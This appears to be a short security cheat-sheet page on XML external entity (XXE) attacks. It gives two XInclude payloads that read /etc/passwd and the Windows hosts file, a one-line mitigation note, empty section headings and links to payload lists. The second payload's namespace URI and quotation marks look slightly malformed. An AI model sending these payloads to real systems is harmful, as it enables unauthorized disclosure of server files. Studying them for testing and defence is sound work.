XXE

XInclude in XXE attack

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo> 
<xi:include xmlns:xi=”http://www.w3.org/2003/XInclude” parse=”text”
href=”file://../../../../../../../../Windows/System32/drivers/etc/hosts”>
<xi:fallback>Oops!</xi:fallback>
</xi:include>

Mitigation: If possible disable XML extensions and entities expansion. Add proper rules for XML extensions that enable this same attack like XInclude and xop.

LogoWhat is XXE (XML external entity) injection? Tutorial & Examples | Web Security AcademyWebSecAcademy

XXE payloads

Ping

File disclosure

Denial of Service

Resources

LogoGitHub - payloadbox/xxe-injection-payload-list: 🎯 XML External Entity (XXE) Injection Payload ListGitHub
LogoXXE - XEE - XML External Entity - HackTricksbook.hacktricks.xyz
LogoDTD Cheat Sheetweb-in-security.blogspot.com

PreviousXSSNextReverse-shell

Last updated

Was this helpful?